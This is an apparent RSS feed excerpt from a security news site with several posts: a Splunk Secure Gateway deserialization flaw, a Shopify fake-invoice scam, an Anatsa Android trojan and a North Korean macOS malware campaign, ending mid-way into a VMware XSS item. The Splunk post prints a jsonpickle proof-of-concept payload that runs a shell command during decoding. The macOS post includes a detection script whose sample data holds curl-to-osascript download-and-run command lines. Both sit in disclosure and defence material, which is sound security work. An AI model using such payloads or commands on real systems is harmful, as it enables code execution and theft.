		<category><![CDATA[Remote code execution]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[vulnerability]]></category>
		<category><![CDATA[Authentication]]></category>
		<category><![CDATA[CVE-2026-20251]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[deserialization]]></category>
		<category><![CDATA[Enterprise Security]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[rce]]></category>
		<category><![CDATA[remote code execution]]></category>
		<category><![CDATA[security update]]></category>
		<category><![CDATA[Splunk]]></category>
		<category><![CDATA[Splunk Secure Gateway]]></category>
		<category><![CDATA[Splunk Security]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11928</guid>

					<description><![CDATA[<p>A high-severity vulnerability, CVE-2026-20251, has been identified in Splunk Secure Gateway (SSG), potentially allowing authenticated users with low-level</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/splunk-secure-gateway-rce/">Splunk Secure Gateway RCE Vulnerability Discovered</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>A high-severity vulnerability, <strong>CVE-2026-20251</strong>, has been identified in Splunk Secure Gateway (SSG), potentially allowing authenticated users with low-level privileges to execute arbitrary code on affected systems. The flaw carries a <strong>CVSS score of 8.8</strong> and poses a significant risk to organizations using Splunk Secure Gateway in enterprise environments.</p>



<p>According to security researchers, the vulnerability is caused by unsafe deserialization of user-controlled data, allowing specially crafted input to be executed on the server.</p>



<h2 class="wp-block-heading"><strong>How the Vulnerability Works</strong></h2>



<p>The issue exists in the way Splunk Secure Gateway processes alert data stored in its KV Store. A low-privileged authenticated user can submit a specially crafted JSON payload through the Splunk REST API.</p>



<p>Due to weaknesses in the application&#8217;s validation process, the malicious data is accepted as legitimate and passed to the deserialization component. This enables attackers to execute arbitrary Python code with the privileges of the Splunk service account.</p>



<p>Researchers found that the validation logic fails to inspect all fields within the submitted JSON document. As a result, attackers can bypass security checks by embedding malicious content inside otherwise valid data structures.</p>



<p>A successful attack requires only a valid low-privileged Splunk account and does not rely on user interaction, making the vulnerability particularly dangerous in shared enterprise environments.</p>



<p><strong>Below is a simplified proof-of-concept (PoC) demonstrating how the vulnerability can be exploited using a benign command:</strong></p>



<pre class="wp-block-code"><code>import jsonpickle
import subprocess

# An otherwise ordinary-looking Alert document that carries jsonpickle
# control tags. The nested "py/reduce" entry instructs jsonpickle to call
# the named function with the given arguments while rebuilding the object.
payload = {
    "py/object": "spacebridgeapp.data.alert_data.Alert",
    "notification": {
        "py/reduce": [
            {"py/function": "subprocess.check_output"},
            {"py/tuple": [["uname", "-a"]]}   # benign command used for the demo
        ]
    }
}

encoded = jsonpickle.encode(payload)
# safe=True is jsonpickle's restricted mode; the nested tag is still honoured.
decoded = jsonpickle.decode(encoded, safe=True)
print(decoded)</code></pre>



<p>Running the script executes the <code>subprocess.check_output(["uname", "-a"])</code> command during data deserialization. This confirms that enabling the <code>safe=True</code> option in <strong>jsonpickle</strong> does not fully prevent exploitation.</p>
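<p>The validation gap described above (reconstruction tags hidden inside an otherwise valid document) can be closed before any deserializer sees the data. The following is an added example, not code from this post or from Splunk: it parses the submission with the standard-library JSON parser, rejects any <code>py/*</code> tag at any depth, and allow-lists the expected fields. The alert schema and the sample documents are constructed for the example.</p>

```python
"""Defensive pre-check for JSON documents destined for jsonpickle.

Added example, not part of the original post or of Splunk's code. It assumes
nothing about Splunk internals: it treats the incoming document as plain JSON
(parsed with the standard library, never with jsonpickle) and rejects it if any
jsonpickle control tag ("py/object", "py/reduce", "py/function", ...) appears
anywhere in the structure, however deeply nested, so a payload hidden inside an
otherwise valid field is caught. It also shows the complementary allow-list:
only the expected top-level keys with the expected scalar types are accepted.
"""
import json
from typing import Any, Dict, List, Tuple

# Every jsonpickle control key begins with "py/"; the ones that drive object
# reconstruction (py/object, py/reduce, py/function, ...) must never reach decode().
JSONPICKLE_TAG_PREFIX = "py/"

# Hypothetical schema for an alert document: field name -> allowed Python type.
# Constructed for this example; the real Secure Gateway schema is not on the page.
ALERT_SCHEMA: Dict[str, type] = {
    "title": str,
    "severity": str,
    "notification": str,
}


def find_jsonpickle_tags(node: Any, path: str = "$") -> List[str]:
    """Return JSONPath-like locations of every 'py/*' key in the parsed document."""
    hits: List[str] = []
    if isinstance(node, dict):
        for key, value in node.items():
            if isinstance(key, str) and key.startswith(JSONPICKLE_TAG_PREFIX):
                hits.append(f"{path}.{key}")
            hits.extend(find_jsonpickle_tags(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for index, item in enumerate(node):
            hits.extend(find_jsonpickle_tags(item, f"{path}[{index}]"))
    return hits


def validate_alert(raw: str) -> Tuple[bool, List[str]]:
    """Validate an alert document before anything deserializes it.

    Returns (accepted, reasons). json.loads can only ever produce dicts, lists
    and scalars, so no code runs during this check.
    """
    reasons: List[str] = []
    try:
        doc = json.loads(raw)
    except json.JSONDecodeError as exc:
        return False, [f"not valid JSON: {exc.msg}"]

    if not isinstance(doc, dict):
        return False, ["top-level value must be an object"]

    # 1. Reject jsonpickle control tags anywhere in the tree, not just at the top.
    for location in find_jsonpickle_tags(doc):
        reasons.append(f"jsonpickle tag at {location}")

    # 2. Allow-list keys and types at the top level.
    for key, value in doc.items():
        expected = ALERT_SCHEMA.get(key)
        if expected is None:
            reasons.append(f"unexpected field {key!r}")
        elif not isinstance(value, expected):
            reasons.append(
                f"field {key!r} must be {expected.__name__}, got {type(value).__name__}"
            )
    for key in ALERT_SCHEMA:
        if key not in doc:
            reasons.append(f"missing required field {key!r}")

    return (not reasons), reasons


# Constructed sample documents (not real Splunk traffic).
BENIGN_ALERT = json.dumps(
    {"title": "Disk usage high", "severity": "medium", "notification": "email"}
)

# Same shape as the PoC above: a valid-looking outer object with reconstruction
# tags nested inside the 'notification' field. The function name is a harmless
# placeholder; the check keys on the tags, not on which function is named.
TAGGED_ALERT = json.dumps(
    {
        "title": "Disk usage high",
        "severity": "medium",
        "notification": {
            "py/reduce": [
                {"py/function": "builtins.print"},
                {"py/tuple": [["constructed", "example"]]},
            ]
        },
    }
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_ALERT), ("tagged", TAGGED_ALERT)):
        ok, why = validate_alert(doc)
        print(f"{label}: {'accepted' if ok else 'rejected'} {why}")
```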



<p>The flaw affects <strong>Splunk Secure Gateway</strong> versions <strong>3.8.x, 3.9.x, and 3.10.x</strong>, along with <strong>Splunk Enterprise</strong> versions released before <strong>10.0.7, 10.2.4, and 10.4.0</strong>. Splunk has fixed the issue in <strong>Secure Gateway versions 3.8.67, 3.9.20, and 3.10.6</strong>.</p>



<h2 class="wp-block-heading"><strong>Security Recommendations</strong></h2>



<p>To reduce the risk of exploitation, organizations should:</p>



<ul class="wp-block-list">
<li><strong>Apply the latest Splunk Secure Gateway security patches</strong> immediately.</li>



<li><strong>Upgrade to the fixed versions:</strong> SSG <strong>3.8.67</strong>, <strong>3.9.20</strong>, or <strong>3.10.6</strong>, and supported Splunk Enterprise releases.</li>



<li><strong>Disable the Secure Gateway app</strong> if it is not actively being used.</li>



<li><strong>Restrict KV Store write permissions</strong> to trusted administrators only.</li>



<li><strong>Enforce the principle of least privilege</strong> by limiting access to authorized users.</li>



<li><strong>Avoid deserializing untrusted data</strong> with <code>jsonpickle</code> or similar libraries without proper validation.</li>



<li><strong>Implement input validation and class allow-listing</strong> to prevent unsafe deserialization.</li>



<li><strong>Monitor Splunk logs</strong> for unusual activity or unauthorized changes to the KV Store.</li>
</ul>



<p>Following these best practices can help organizations reduce the risk of remote code execution and strengthen the overall security of their Splunk environment.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/splunk-secure-gateway-rce/">Splunk Secure Gateway RCE Vulnerability Discovered</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/splunk-secure-gateway-rce/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fake Shopify Invoices Steal User Credentials</title>
		<link>https://firsthackersnews.com/shopify-fake-invoice-scam/</link>
					<comments>https://firsthackersnews.com/shopify-fake-invoice-scam/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Fri, 26 Jun 2026 17:39:13 +0000</pubDate>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Consumer Security]]></category>
		<category><![CDATA[credential theft]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[Fake Invoice Scam]]></category>
		<category><![CDATA[fraud]]></category>
		<category><![CDATA[Information security]]></category>
		<category><![CDATA[online scam]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[Scam Alert]]></category>
		<category><![CDATA[Shop App]]></category>
		<category><![CDATA[Shopify]]></category>
		<category><![CDATA[social engineering]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<category><![CDATA[vishing]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11923</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a new phishing campaign in which scammers abuse Shopify and its Shop order-tracking app</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/shopify-fake-invoice-scam/">Fake Shopify Invoices Steal User Credentials</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a new phishing campaign in which scammers abuse Shopify and its Shop order-tracking app to deliver fake invoices directly to users. Instead of relying on traditional phishing emails, attackers are placing fraudulent purchase notifications inside a trusted shopping application, making the scam appear more convincing.</p>



<p>The fake invoices often impersonate well-known brands such as Norton, McAfee, Apple, and PayPal, creating a false sense of urgency by claiming that expensive products or subscriptions have been purchased.</p>



<h2 class="wp-block-heading"><strong>How the Scam Works</strong></h2>



<p>The Shop app automatically collects order information from connected email accounts and Shop Pay transactions, allowing users to view all their purchases in one place. Attackers appear to be exploiting this functionality or related merchant processes to insert fake orders into users&#8217; purchase history.</p>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="576" src="https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-1024x576.png" alt="" class="wp-image-11924" srcset="https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-300x169.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-768x432.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-1024x576.png 1024w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4-1536x864.png 1536w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-4.png 1600w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Source: Gen Digital</em></figcaption></figure>



<p>These fraudulent orders typically display costly items, including antivirus subscriptions, smartphones, or gift cards. The invoices also include fake customer support phone numbers hidden within product descriptions, shipping details, or order notes.</p>



<p>When victims call the number, they are connected to scammers posing as customer support representatives. The attackers then attempt to steal sensitive information such as login credentials, payment card details, one-time passwords, or convince victims to install remote access software.</p>



<p>Researchers emphasized that there is currently <strong>no evidence that Shopify or the Shop app has been breached</strong>. Instead, the campaign appears to abuse legitimate platform features to distribute fraudulent content.</p>



<h2 class="wp-block-heading"><strong>How to Stay Safe</strong></h2>



<p>Users should always verify unexpected purchase notifications before taking any action. If an invoice appears suspicious, check your bank account or the official service provider directly instead of calling phone numbers listed in the receipt.</p>



<p>To reduce the risk of becoming a victim:</p>



<ul class="wp-block-list">
<li>Verify purchases through official websites or banking apps.</li>



<li>Never call support numbers included in unexpected invoices.</li>



<li>Report suspicious orders through the Shop app or Shopify&#8217;s abuse channels.</li>



<li>Avoid installing software at the request of unknown callers.</li>
</ul>



<p>This campaign demonstrates how cybercriminals are increasingly exploiting trusted platforms instead of relying solely on phishing emails. As users become more cautious of email scams, attackers are shifting their focus to legitimate applications where fraudulent content is less likely to raise suspicion.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/shopify-fake-invoice-scam/">Fake Shopify Invoices Steal User Credentials</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/shopify-fake-invoice-scam/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Malware Hidden in Fake Android Reader App</title>
		<link>https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/</link>
					<comments>https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 24 Jun 2026 16:59:25 +0000</pubDate>
				<category><![CDATA[Android banking trojan]]></category>
		<category><![CDATA[Android malware]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<category><![CDATA[Security Update]]></category>
		<category><![CDATA[Anatsa]]></category>
		<category><![CDATA[android malware]]></category>
		<category><![CDATA[android security]]></category>
		<category><![CDATA[banking malware]]></category>
		<category><![CDATA[banking trojan]]></category>
		<category><![CDATA[credential theft]]></category>
		<category><![CDATA[cyber threats]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[google play store]]></category>
		<category><![CDATA[Information security]]></category>
		<category><![CDATA[malware campaign]]></category>
		<category><![CDATA[mobile malware]]></category>
		<category><![CDATA[mobile security]]></category>
		<category><![CDATA[security research]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11905</guid>

					<description><![CDATA[<p>Cybersecurity researchers have uncovered a new Android malware campaign that used a fake document reader application to distribute</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/">Malware Hidden in Fake Android Reader App</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Cybersecurity researchers have uncovered a new Android malware campaign that used a fake document reader application to distribute the Anatsa banking trojan. The app appeared to be a legitimate file-reading utility on the Google Play Store and gained more than 100,000 downloads before malicious functionality was activated.</p>



<p>The application initially behaved like a normal productivity tool, helping it gain user trust and positive ratings. Once a significant user base was established, attackers pushed an update that downloaded and installed the Anatsa malware from a remote server.</p>



<h2 class="wp-block-heading"><strong>How the Attack Worked</strong></h2>



<p>The malicious app was disguised as a document reader and file management tool. Early versions appeared harmless, allowing the application to gain credibility and attract thousands of users. After reaching a large install base, a malicious update downloaded the Anatsa payload and connected to attacker-controlled servers.</p>



<p>Researchers identified the following indicators of compromise (IOCs):</p>



<ul class="wp-block-list">
<li>Installer MD5: <strong>f72b1a333fa28b133df6476561142d6a</strong></li>



<li>Payload MD5: <strong>61d25684e6f42e386f40ee60f5c54dca</strong></li>



<li>Command-and-Control Server: <strong>hxxp://162.252.173[.]37:85/api</strong></li>
</ul>



<h2 class="wp-block-heading"><strong>Why Anatsa Is Dangerous</strong></h2>



<p>Anatsa is a banking trojan designed to steal financial information from Android users. Once active, it monitors devices for targeted banking applications and uses fake screens to capture credentials while hiding suspicious activity from victims.</p>



<p>This campaign follows a strategy commonly used by Anatsa operators. Instead of releasing malware immediately, attackers first build trust through seemingly legitimate apps. By the time the malicious update is delivered, the application has already accumulated downloads, ratings, and user confidence.</p>



<h2 class="wp-block-heading"><strong>How to Stay Protected</strong></h2>



<ul class="wp-block-list">
<li>Review recently installed document-reader and file-management apps.</li>



<li>Be cautious of apps that suddenly request new permissions after updates.</li>



<li>Remove suspicious applications and scan affected devices immediately.</li>
</ul>



<p>The incident serves as a reminder that even apps downloaded from official stores should be carefully evaluated. High download numbers and positive reviews alone are not enough to guarantee safety.</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/">Malware Hidden in Fake Android Reader App</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/fake-document-reader-app-anatsa-malware/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Sapphire Sleet Targets macOS With Multi-Stage Malware</title>
		<link>https://firsthackersnews.com/sapphire-sleet-macos-malware/</link>
					<comments>https://firsthackersnews.com/sapphire-sleet-macos-malware/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Wed, 17 Jun 2026 21:21:21 +0000</pubDate>
				<category><![CDATA[Application Security]]></category>
		<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[cyberattack]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[MacOS]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Apple security]]></category>
		<category><![CDATA[AppleScript Malware]]></category>
		<category><![CDATA[credential theft]]></category>
		<category><![CDATA[Cryptocurrency Wallet Theft]]></category>
		<category><![CDATA[cyber threats]]></category>
		<category><![CDATA[Cybersecurity News]]></category>
		<category><![CDATA[data theft]]></category>
		<category><![CDATA[endpoint security]]></category>
		<category><![CDATA[Information Stealer]]></category>
		<category><![CDATA[macos malware]]></category>
		<category><![CDATA[macOS Security]]></category>
		<category><![CDATA[malware analysis]]></category>
		<category><![CDATA[malware campaign]]></category>
		<category><![CDATA[North Korean Hackers]]></category>
		<category><![CDATA[sapphire sleet]]></category>
		<category><![CDATA[security research]]></category>
		<category><![CDATA[TCC Bypass]]></category>
		<category><![CDATA[Telegram Bot API]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11865</guid>

					<description><![CDATA[<p>Researchers have uncovered a new macOS malware campaign linked to the North Korean threat group known as Sapphire</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/sapphire-sleet-macos-malware/">Sapphire Sleet Targets macOS With Multi-Stage Malware</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Researchers have uncovered a new macOS malware campaign linked to the North Korean threat group known as Sapphire Sleet. The attackers are using fake software update files disguised as Zoom and Microsoft Teams SDK updates to trick users into infecting their systems.</p>



<p>The campaign relies on AppleScript files that appear harmless at first glance but secretly execute multiple stages of malware in the background. By using built-in macOS tools, the attackers can avoid several security protections and quietly deploy additional payloads.</p>



<h2 class="wp-block-heading"><strong>How the Attack Works</strong></h2>



<p>The infection begins when a user opens a malicious AppleScript (.scpt) file disguised as a software update.</p>



<figure class="wp-block-image size-full"><img decoding="async" width="947" height="390" src="https://firsthackersnews.com/wp-content/uploads/2026/06/image-1.png" alt="" class="wp-image-11866" srcset="https://firsthackersnews.com/wp-content/uploads/2026/06/image-1-300x124.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-1-768x316.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-1.png 947w" sizes="(max-width: 947px) 100vw, 947px" /><figcaption class="wp-element-caption"><strong>Malicious .scpt file used to initiate the attack (Source: Microsoft)</strong><br></figcaption></figure>



<p>The script displays a large block of harmless-looking text while hidden code runs in the background. Once executed, it uses the curl command to download additional AppleScript payloads from attacker-controlled servers and immediately executes them through osascript.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="855" src="https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-1024x855.png" alt="" class="wp-image-11867" srcset="https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-300x251.png 300w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-768x641.png 768w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-1024x855.png 1024w, https://firsthackersnews.com/wp-content/uploads/2026/06/image-2-1536x1283.png 1536w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><strong>Process flow showing malware execution stages (Source: Microsoft)</strong><br></figcaption></figure>



<p>This multi-stage approach allows attackers to:</p>



<ul class="wp-block-list">
<li>Download additional malware</li>



<li>Communicate with command-and-control servers</li>



<li>Establish persistence on the device</li>



<li>Deploy backdoors</li>



<li>Harvest credentials</li>



<li>Collect sensitive information</li>
</ul>



<p>Researchers noted that this technique helps the attackers bypass several macOS security checks because the execution appears to be initiated by the user.</p>
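<p>One way to surface the staging chain described above from process telemetry. This is an added example, not code from this post or from Microsoft or Apple: it runs over constructed process-start records (pid, parent pid, executable name, command line) and flags curl launched from under osascript, osascript running a second script, and download-and-run one-liners. Apart from the lure file name taken from the article, all sample values are made up.</p>

```python
"""Detection logic for the AppleScript staging chain described above.

Added example; not code from the original post or from Microsoft or Apple.
It runs over constructed process-start records (pid, parent pid, executable
name, command line), the minimum an EDR or macOS endpoint-security feed
provides, and flags the pattern the article describes: curl being launched
from under osascript, osascript running a downloaded stage, or a one-liner
that pipes curl output straight into osascript. All sample values are made up
except the 'Zoom SDK Update.scpt' lure name, which comes from the article.
"""
from dataclasses import dataclass
from typing import Dict, List

SHELLS = {"sh", "bash", "zsh"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    name: str      # executable basename as reported by the sensor
    cmdline: str   # full command line


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    cmdline: str


def ancestors(pid: int, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Return the parent chain of pid, nearest first, stopping at unknown pids or cycles."""
    chain: List[ProcEvent] = []
    seen = {pid}
    ev = by_pid.get(pid)
    while ev is not None:
        parent = by_pid.get(ev.ppid)
        if parent is None or parent.pid in seen:
            break
        chain.append(parent)
        seen.add(parent.pid)
        ev = parent
    return chain


def find_scpt_staging(events: List[ProcEvent]) -> List[Finding]:
    """Flag processes that match the curl/osascript staging chain."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        under_osascript = any(p.name == "osascript" for p in ancestors(ev.pid, by_pid))
        if ev.name == "curl" and under_osascript:
            # Stage-one script fetching the next stage from a remote server.
            findings.append(Finding(ev.pid, "curl spawned under osascript", ev.cmdline))
        elif ev.name == "osascript" and under_osascript:
            # A script executing another script: the downloaded stage being run.
            findings.append(Finding(ev.pid, "osascript launched by osascript", ev.cmdline))
        elif ev.name in SHELLS and "curl" in ev.cmdline and "osascript" in ev.cmdline:
            # Download and execution collapsed into one shell command.
            findings.append(Finding(ev.pid, "curl output fed to osascript", ev.cmdline))
    return findings


# Constructed process tree: the lure script spawns a shell that runs curl,
# then runs the fetched file with osascript, then a download-and-run one-liner.
# Two unrelated benign processes are included to show they are not flagged.
SAMPLE_EVENTS = [
    ProcEvent(501, 1,   "osascript", "osascript /Users/user/Downloads/Zoom SDK Update.scpt"),
    ProcEvent(502, 501, "sh",        "sh -c curl -fsSL https://example.invalid/stage2 -o /tmp/stage2"),
    ProcEvent(503, 502, "curl",      "curl -fsSL https://example.invalid/stage2 -o /tmp/stage2"),
    ProcEvent(504, 501, "osascript", "osascript /tmp/stage2"),
    ProcEvent(505, 501, "sh",        "sh -c curl -fsSL https://example.invalid/stage3 | osascript"),
    ProcEvent(600, 1,   "curl",      "curl -s https://example.invalid/health"),
    ProcEvent(601, 1,   "osascript", "osascript -e display notification \"backup done\""),
]

if __name__ == "__main__":
    for f in find_scpt_staging(SAMPLE_EVENTS):
        print(f"pid {f.pid}: {f.rule}: {f.cmdline}")
```

Real sensors report ancestry differently (and the lure may be opened by Script Editor rather than osascript directly), so the executable names are the tunable part; the lineage walk is what makes the rule robust to an intermediate shell.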



<h2 class="wp-block-heading"><strong>Credential Theft and Data Collection</strong></h2>



<p>The malware includes several components designed to steal valuable information from infected systems.</p>



<p>Capabilities observed in the campaign include:</p>



<ul class="wp-block-list">
<li>Stealing macOS passwords</li>



<li>Harvesting browser data</li>



<li>Collecting cryptocurrency wallet information</li>



<li>Accessing Telegram session data</li>



<li>Extracting SSH keys</li>



<li>Gathering Apple Notes data</li>



<li>Capturing system information</li>



<li>Uploading stolen files to attacker infrastructure</li>
</ul>



<p>One component displays a legitimate-looking password prompt to trick users into entering their system credentials. Once verified, the credentials are sent to the attackers.</p>



<p>Researchers also found attempts to manipulate macOS Transparency, Consent, and Control (TCC) settings, allowing the malware to gain broader access to files and applications without generating additional security warnings.</p>



<h2 class="wp-block-heading"><strong>Security Recommendations</strong></h2>



<p>Microsoft and Apple have released protections to help detect and block this activity. Apple updated XProtect and Safe Browsing protections, while Microsoft added new detection capabilities to Microsoft Defender.</p>



<p>Security teams are encouraged to:</p>



<ul class="wp-block-list">
<li>Avoid running unsolicited .scpt files</li>



<li>Verify software updates through official vendor websites</li>



<li>Monitor suspicious curl and osascript activity</li>



<li>Restrict execution of unsigned applications</li>



<li>Watch for unusual TCC database modifications</li>



<li>Rotate credentials if compromise is suspected</li>



<li>Use hardware wallets for cryptocurrency storage</li>
</ul>



<p>The campaign highlights how threat actors continue to abuse trusted macOS tools and social engineering techniques to bypass security controls and gain access to sensitive user data.</p>



<h2 class="wp-block-heading"><strong>Indicators of compromise</strong></h2>



<p><strong>Malicious file hashes</strong></p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td><strong>File</strong></td><td><strong>SHA-256</strong></td></tr><tr><td>/Users/&lt;user&gt;/Downloads/Zoom SDK Update.scpt</td><td>2075fd1a1362d188290910a8c55cf30c11ed5955c04af410c481410f538da419</td></tr><tr><td>MSTeams SDK Update.scpt</td><td>980bf65c703edae7b28a752207a84b80332be0dae4ee87f00928f82a011ab0ce</td></tr><tr><td>/Users/&lt;user&gt;/com.apple.cli</td><td>05e1761b535537287e7b72d103a29c4453742725600f59a34a4831eafc0b8e53</td></tr><tr><td>/Users/&lt;user&gt;/com.microsoft.helper</td><td>3e6fcace412827b14d4af9fc7ca1b8867f75f40c589f3fdca50e988466f00279</td></tr><tr><td>/Users/&lt;user&gt;/.google.doc</td><td>5f457c492773b832054d007ba94d2e89c22dac8458dc9dc1b1d91896777c0c9f</td></tr><tr><td>/Users/&lt;user&gt;/.com.apple.helpers</td><td>97ccc28808d2c21b83f24835744af754920a992e57216d2cbc8315664905b0e2</td></tr><tr><td>/Users/&lt;user&gt;/Library/Services/services<br>&nbsp;services / icloudz</td><td>5fbbca2d72840feb86b6ef8a1abb4fe2f225d84228a714391673be2719c73ac7</td></tr><tr><td>com.google.chromes.updaters</td><td>5e581f22f56883ee13358f73fabab00fcf9313a053210eb12ac18e66098346e5</td></tr><tr><td>com.google.webkit.service.plist</td><td>95e893e7cdde19d7d16ff5a5074d0b369abd31c1a30962656133caa8153e8d63</td></tr><tr><td>com.apple.identification.plist</td><td>fcd0c4f9d4311de6f400cc61f476dd60ae06f8d19568dbbaa1a118e1a0ff68ab</td></tr><tr><td>/private/tmp/SystemUpdate/systemupdate.app/Contents/MacOS/Mac Password Popup</td><td>8fd5b8db10458ace7e4ed335eb0c66527e1928ad87a3c688595804f72b205e8c</td></tr><tr><td>/private/tmp/SoftwareUpdate/softwareupdate.app/Contents/MacOS/Mac Password Popup</td><td>a05400000843fbad6b28d2b76fc201c3d415a72d88d8dc548fafd8bae073c640</td></tr></tbody></table></figure>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/sapphire-sleet-macos-malware/">Sapphire Sleet Targets macOS With Multi-Stage Malware</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://firsthackersnews.com/sapphire-sleet-macos-malware/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>VMware Stored XSS Flaws Put Enterprise Environments at Risk</title>
		<link>https://firsthackersnews.com/vmware-stored-xss-flaws/</link>
					<comments>https://firsthackersnews.com/vmware-stored-xss-flaws/#respond</comments>
		
		<dc:creator><![CDATA[FHN]]></dc:creator>
		<pubDate>Mon, 08 Jun 2026 12:33:00 +0000</pubDate>
				<category><![CDATA[Cyber threat]]></category>
		<category><![CDATA[Cybercriminals]]></category>
		<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Internet Security]]></category>
		<category><![CDATA[malicious cyber actors]]></category>
		<category><![CDATA[Secuirty Update]]></category>
		<category><![CDATA[Security Advisory]]></category>
		<guid isPermaLink="false">https://firsthackersnews.com/?p=11794</guid>

					<description><![CDATA[<p>VMware has disclosed three high-severity security vulnerabilities affecting VMware Cloud Foundation (VCF) Operations that could allow attackers to</p>
<p>The post <a rel="nofollow" href="https://firsthackersnews.com/vmware-stored-xss-flaws/">VMware Stored XSS Flaws Put Enterprise Environments at Risk</a> appeared first on <a rel="nofollow" href="https://firsthackersnews.com">First Hackers News</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>VMware has disclosed three high-severity security vulnerabilities affecting VMware Cloud Foundation (VCF) Operations that could allow attackers to inject malicious scripts into management interfaces.</p>



